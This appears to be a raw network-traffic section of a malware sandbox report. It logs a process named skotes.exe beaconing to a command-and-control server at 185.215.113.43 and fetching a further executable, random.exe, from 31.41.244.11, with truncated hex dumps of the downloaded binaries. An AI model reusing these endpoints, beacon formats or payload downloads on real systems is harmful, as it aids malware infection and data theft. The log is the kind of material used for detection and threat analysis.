                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 60 4c 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%|^`L@L@Vjl <@.rsrclL@.idata T@ `*V@kucwzsnpP2X@vgfkprooPLV@.taggant0`L"Z@
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827711105 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827765942 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827800035 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827846050 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827883959 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: UtJF7rx>l]!xU]5-e$C
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827927113 CET1236INData Raw: f1 eb a3 f6 99 dc 80 48 ac 89 f7 b9 24 a3 4d cf 8e 3b 0c 5b 02 d6 4a 3f d4 ed 84 f7 0a 18 7a a7 fc cc 47 f5 b8 cd cd 02 94 0b 59 41 33 d5 5b e9 36 45 34 9f 7f 6b 25 27 82 49 ed 0a f3 67 bd 8b 08 28 b1 af 93 4b 8d 3b 58 cc 80 a8 28 e2 09 34 89 d2
                                                                                                                                                                                          Data Ascii: H$M;[J?zGYA3[6E4k%'Ig(K;X(4aSOEv%Fd}HrnHff"SuFxpO"@Esm%|Zj"3RnaZx3g6xM\[Pz%t)HvMegTuW
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827979088 CET1236INData Raw: f5 f5 56 12 31 0b c3 97 b0 50 15 8a 4a a6 29 f7 f0 8c cd ad fc e0 79 a2 07 67 0f 1b da 39 06 68 24 23 30 1d 16 c6 e6 ad ba dd 3c c2 ab e7 a8 40 72 a4 39 da ed f4 e3 ad 93 c2 76 39 9b 1b 27 02 a1 75 42 5a 8d 2b 0f 1f 64 0c 7e 67 6b f4 2f b1 0c c6
                                                                                                                                                                                          Data Ascii: V1PJ)yg9h$#0<@r9v9'uBZ+d~gk/T<r'9X|Dz4<+Lu%K;$pMQZP$ }/YmStA.$<|AG2SHC4XfOFA)Zu}}<Omi`7
                                                                                                                                                                                          Dec 18, 2024 09:07:29.828012943 CET896INData Raw: 36 c6 86 7b 73 3c 3d 73 1d e7 3c f8 72 33 07 d8 08 f4 6f b3 93 f5 ae 39 e2 d5 9a 85 a0 31 5a 5a 2c de 0e eb 68 ac 6a 67 c6 e6 2f 5c c3 c6 e7 1c ee b1 3d 34 b9 e7 d0 d5 72 be e0 1b a6 f5 c9 17 7a 9c 99 4b b8 3c c8 73 31 4c a1 a2 00 dc df 48 c3 6b
                                                                                                                                                                                          Data Ascii: 6{s<=s<r3o91ZZ,hjg/\=4rzK<s1LHk*rP>)sg.MR}\,m2pSt1$d4;[/iU0,E3K0x_2=%rtQP(xxUOvQ0r9H9Q[
                                                                                                                                                                                          Dec 18, 2024 09:07:29.828099966 CET1236INData Raw: 88 5a 35 50 b2 29 a6 85 ec cc 39 43 36 89 cd 1f 08 5c 1f c3 78 e0 b1 d6 0d 84 cc 0e a4 75 99 3f 9c e1 f7 75 30 90 3f 0f 09 50 15 c3 05 a0 2f f7 6f 41 24 f3 fc cc 6e 05 27 b3 cd 25 14 35 c1 c3 78 88 9f b4 f6 84 19 69 c3 5b 99 3f bc e2 7e 51 30 fc
                                                                                                                                                                                          Data Ascii: Z5P)9C6\xu?u0?P/oA$n'%5xi[?~Q04PO8[xCxO[,P_?[A0aPl/m~AH&cMeM|*O`|m#R|t+bd%"zXH\$lh[b
                                                                                                                                                                                          Dec 18, 2024 09:07:29.947691917 CET1236INData Raw: 91 83 99 3f 10 99 60 1e 31 c8 25 83 c1 50 15 c0 2c 23 00 ff d6 79 33 a7 f2 4a c0 20 b7 b0 11 d4 08 69 7e 97 0a 82 6e 7d 1f 3c 1e 03 b5 9e 8e 9c 74 33 b0 4f f8 d5 6b 86 19 45 81 c8 56 71 25 51 81 3d 65 cf f1 da 96 dd 74 dc 4a 48 26 9d 01 b9 1c 1d
                                                                                                                                                                                          Data Ascii: ?`1%P,#y3J i~n}<t3OkEVq%Q=etJH&wOBFlP2.E2&@%o9u}HtD6{bT}f;m~XSNtn7$;_J;yt&} Dl~<SuS$$#IM;5Q68n}k|


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          7192.168.2.849723185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:35.526653051 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 36 38 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                          Data Ascii: d1=1016853001&unit=246122658369
                                                                                                                                                                                          Dec 18, 2024 09:07:36.857047081 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:36 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          8192.168.2.84972431.41.244.11806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:36.996366978 CET59OUTGET /files/dodo/random.exe HTTP/1.1
                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307538986 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:38 GMT
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Length: 765568
                                                                                                                                                                                          Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          ETag: "67614868-bae80"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bss`@
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307600021 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307611942 CET1236INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                                                          Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307742119 CET1236INData Raw: f0 68 6d 64 85 93 ff 35 6c 64 42 00 e8 16 fb ff ff 83 c4 08 89 45 e4 8b 55 e4 ff d2 bb 49 05 00 00 be 11 50 42 00 6a 11 68 00 50 42 00 53 56 e8 96 fc ff ff 83 c4 10 6a 0a 68 00 c0 41 00 57 8b 7d 08 57 e8 82 fc ff ff 83 c4 10 68 01 dc af 8a ff 35
                                                                                                                                                                                          Data Ascii: hmd5ldBEUIPBjhPBSVjhAW}Wh5ldBMQj@SVuM11^_[]}uVPB'jT9BUSWV,\$@WB1D$(d=0w@ldBhb-/5ldBE(AD$
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307756901 CET896INData Raw: 42 00 31 e0 89 44 24 08 8b 01 8b 40 04 8b 7c 01 38 85 ff 74 48 89 e3 89 d9 56 e8 1a ff ff ff 80 7b 04 00 74 31 8b 07 89 f9 ff 50 34 83 f8 ff 0f 94 c0 8b 0e 8b 51 04 8d 0c 16 83 7c 16 38 00 0f 94 c4 08 c4 0f b6 c4 c1 e0 02 0b 44 16 0c 6a 00 50 e8
                                                                                                                                                                                          Data Ascii: B1D$@|8tHV{t1P4Q|8DjPnL$1^_[WV D$,WB1T$A#AuL$1 ^_|$0t1PP?BBDBD@Bt$RWhABV?
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307782888 CET1236INData Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89
                                                                                                                                                                                          Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307792902 CET1236INData Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64
                                                                                                                                                                                          Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
                                                                                                                                                                                          Dec 18, 2024 09:07:38.307813883 CET448INData Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1
                                                                                                                                                                                          Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
                                                                                                                                                                                          Dec 18, 2024 09:07:38.308089018 CET1236INData Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31
                                                                                                                                                                                          Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
                                                                                                                                                                                          Dec 18, 2024 09:07:38.308099985 CET1236INData Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78
                                                                                                                                                                                          Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA^UQj cEY
                                                                                                                                                                                          Dec 18, 2024 09:07:38.427479982 CET1236INData Raw: 8b 01 8b 50 fc 2b c2 83 c0 fc 83 f8 1f 77 04 89 11 5d c3 e9 7b 81 00 00 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 52 50 50 51 e8 45 00 00 00 83 c4 10 c3 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 50 52 50 51 e8 2b 00 00 00 83 c4 10 c3 55 8b ec 8b 45 0c
                                                                                                                                                                                          Data Ascii: P+w]{AQvRPPQEAQvPRPQ+UE9EtQvPuRQ]UUv<=At3MVuAW}F;F;GVPRW_^]UQS]VWMw+u;Bv+


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          9192.168.2.849726185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:42.233762026 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 36 38 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                          Data Ascii: d1=1016854001&unit=246122658369
                                                                                                                                                                                          Dec 18, 2024 09:07:44.940169096 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:44 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          10192.168.2.849729185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:46.712085009 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                          Dec 18, 2024 09:07:48.009388924 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:47 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          11192.168.2.849731185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:49.664885044 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                          Dec 18, 2024 09:07:50.989154100 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:50 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          12192.168.2.849733185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:52.822746038 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                          Dec 18, 2024 09:07:54.159136057 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:53 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          13192.168.2.849735185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:55.795237064 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                          Dec 18, 2024 09:07:57.142173052 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:56 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          14192.168.2.849738185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:07:58.887623072 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                          Dec 18, 2024 09:08:00.223702908 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:08:00 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          15192.168.2.849739185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:08:01.855036974 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                          Dec 18, 2024 09:08:03.196125031 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:08:02 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 7 <c><d>0


